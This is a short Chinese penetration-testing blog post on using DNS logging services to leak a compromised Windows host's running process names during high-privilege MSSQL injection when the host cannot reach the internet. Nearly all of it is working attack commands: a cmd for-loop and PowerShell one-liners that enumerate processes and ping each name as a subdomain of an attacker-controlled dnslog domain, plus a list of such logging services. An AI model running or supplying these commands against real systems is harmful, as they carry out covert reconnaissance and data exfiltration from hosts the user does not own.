利用dnslog探测目标进程

2021年12月30日

常用于mssql高权限注入目标主机不岀网

利用cmdshell for循环实现

for /F %i in ('wmic process get Name ^| findstr ".exe"') do ping -n 1 %i.xxxx.dnslog.cn >nul

用powershell foreach循环实现

先导出进程列表
powershell -c "Get-Process | select processname > 1.txt"

powershell -c "Get-Content .\1.txt | Sort-Object -Unique | ForEach-Object {if($_ -match $regex){$b=$_.trim();ping -n 1 $b'.xxxx.check.dns1.top.'} }"


http://ceye.io/

http://dnslog.cn/

https://log.xn--9tr.com/



分类:技术文章 | 标签: 渗透windows提权 | 查看:621
Linux经典后门一条命令清除mstsc记录

发表评论: